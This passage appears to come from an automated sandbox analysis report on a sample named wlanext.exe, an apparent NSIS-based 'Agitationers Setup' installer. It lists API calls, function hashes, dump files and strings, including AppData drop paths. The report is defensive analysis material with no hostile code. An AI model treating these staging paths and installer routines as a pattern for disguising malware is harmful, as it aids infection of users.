                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                                                          • Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
                                                          • Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                                                          • Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 004031D2
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                          • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                          • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                          • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,00403E3D), ref: 0040406B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                                                          • Instruction ID: d750239a91494785f156a03a2b8d5ac9aaa4eec5ddabb582aaccf4f48b9497e5
                                                          • Opcode Fuzzy Hash: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                                                          • Instruction Fuzzy Hash: C9A012710000009BCB015B00EF04C057F61AB507007018434A2404003186310432FF1D
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404A5C
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404A67
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
                                                          • LoadBitmapA.USER32(0000006E), ref: 00404AC4
                                                          • SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
                                                          • DeleteObject.GDI32(00000000), ref: 00404B3A
                                                          • SendMessageA.USER32(?,00000143,00000000,00000000,00000000,?), ref: 00404B65
                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
                                                          • SendMessageA.USER32(?,00001100,00000000,?,?,00000016,?,?,00000015,?), ref: 00404C06
                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000,?,00000016,?,?,00000015,?), ref: 00404C31
                                                          • SendMessageA.USER32(?,00001100,00000000,?,?,00000016,?,?,00000015,?), ref: 00404C45
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404C74
                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
                                                          • ShowWindow.USER32(?,00000005), ref: 00404C93
                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
                                                          • SendMessageA.USER32(?,00000420,00000000,00000020,00000020), ref: 00404E2E
                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00404E63
                                                          • GlobalFree.KERNEL32(00000000), ref: 00404E73
                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000,00000000), ref: 00404EEC
                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FC4
                                                          • ShowWindow.USER32(?,00000000), ref: 00405012
                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040501D
                                                          • ShowWindow.USER32(00000000), ref: 00405024
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
                                                          • Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
                                                          • Opcode Fuzzy Hash: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
                                                          • Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404520
                                                          • SetWindowTextA.USER32(00000000,?), ref: 0040454A
                                                          • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404606
                                                          • lstrcmpiA.KERNEL32(: Completed,Agitationers Setup: Completed,00000000,?,?), ref: 00404638
                                                          • lstrcatA.KERNEL32(?,: Completed), ref: 00404644
                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656
                                                            • Part of subcall function 004056A0: GetDlgItemTextA.USER32 ref: 004056B3
                                                            • Part of subcall function 0040620A: CharNextA.USER32(?), ref: 00406262
                                                            • Part of subcall function 0040620A: CharNextA.USER32(?), ref: 0040626F
                                                            • Part of subcall function 0040620A: CharNextA.USER32(?), ref: 00406274
                                                            • Part of subcall function 0040620A: CharPrevA.USER32(?,?), ref: 00406284
                                                          • GetDiskFreeSpaceA.KERNEL32 ref: 00404714
                                                          • MulDiv.KERNEL32 ref: 0040472F
                                                            • Part of subcall function 00404888: lstrlenA.KERNEL32(Agitationers Setup: Completed,Agitationers Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                                            • Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
                                                            • Part of subcall function 00404888: SetDlgItemTextA.USER32(?,Agitationers Setup: Completed), ref: 00404941
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: : Completed$A$Agitationers Setup: Completed$C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank$Triu,fe$
                                                          • API String ID: 2624150263-272639415
                                                          • Opcode ID: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
                                                          • Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
                                                          • Opcode Fuzzy Hash: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
                                                          • Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D
                                                          APIs
                                                          • DeleteFileA.KERNEL32(?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405791
                                                          • lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D9
                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057FA
                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405800
                                                          • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405811
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
                                                          • FindClose.KERNEL32(00000000), ref: 004058CF
                                                          Strings
                                                          • \*.*, xrefs: 004057D3
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405775
                                                          • "C:\Users\user\AppData\Roaming\wlanext.exe" , xrefs: 00405768
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\AppData\Roaming\wlanext.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-101381915
                                                          • Opcode ID: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
                                                          • Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
                                                          • Opcode Fuzzy Hash: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
                                                          • Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69
                                                          APIs
                                                          • CoCreateInstance.OLE32(00408514,?,00000001,00408504,?), ref: 00402153
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd, xrefs: 00402193
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd
                                                          • API String ID: 123533781-954670299
                                                          • Opcode ID: 1610a6dbc7dec8762baab5a9d78a63419d4168560e646a1fa6be2fd47d0d6743
                                                          • Instruction ID: e240bf9bd5167367365347af51bd1272e3bc3770d4ab5d97d329ed4db4fc5742
                                                          • Opcode Fuzzy Hash: 1610a6dbc7dec8762baab5a9d78a63419d4168560e646a1fa6be2fd47d0d6743
                                                          • Instruction Fuzzy Hash: 81510771A00208BFCF10DFE4C989A9D7BB6AF48318F2085AAF515EB2D1DA799941CF54
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 1a3ea962636febb31e9d594ebab932afba6d02117da4208cd1eca965de443282
                                                          • Instruction ID: 54a63a0b970f9f74e56537ecc54aa136cf23b82a2183361db5dda5742450debe
                                                          • Opcode Fuzzy Hash: 1a3ea962636febb31e9d594ebab932afba6d02117da4208cd1eca965de443282
                                                          • Instruction Fuzzy Hash: 83F0EC72604151DBD700E7A49949DFEB76CDF11324FA0057BE181F20C1CABC8A459B3A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                                                          • Instruction ID: 39e82714288353bf73825cbb988a8a6af090c2e25faa9df829ed1fe8e01e3ef1
                                                          • Opcode Fuzzy Hash: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                                                          • Instruction Fuzzy Hash: CFE18A71900706DFDB24CF58C880BAABBF5EB44305F15852EE897A72D1E738AA91CF54
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                                                          • Instruction ID: bf128a229d130661f6540426524f772d2f37fab74758cf72108bd9da8b00e916
                                                          • Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                                                          • Instruction Fuzzy Hash: 22C15931E042599BCF14CF68D4905EEB7B2FF89314F25826AD8567B380D738A942CF95
                                                          APIs
                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404235
                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 00404249
                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000,00000000), ref: 00404267
                                                          • GetSysColor.USER32(?), ref: 00404278
                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
                                                          • lstrlenA.KERNEL32(?), ref: 00404299
                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000,?), ref: 004042A8
                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040431F
                                                          • SendMessageA.USER32(00000000), ref: 00404322
                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040434D
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
                                                          • SetCursor.USER32(00000000), ref: 004043A5
                                                          • LoadCursorA.USER32(00000000,00007F00,0000070B,0042E3A0,00000001), ref: 004043BB
                                                          • SetCursor.USER32(00000000), ref: 004043BE
                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043EA
                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: : Completed$N$uA@
                                                          • API String ID: 3103080414-130251812
                                                          • Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                                                          • Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
                                                          • Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                                                          • Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,Agitationers Setup,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: Agitationers Setup$F
                                                          • API String ID: 941294808-1687728078
                                                          • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                                                          • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                                                          • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                                                          • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405C40
                                                          • GetShortPathNameA.KERNEL32 ref: 00405C49
                                                            • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                                            • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                                                          • GetShortPathNameA.KERNEL32 ref: 00405C66
                                                          • wsprintfA.USER32 ref: 00405C84
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
                                                          • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
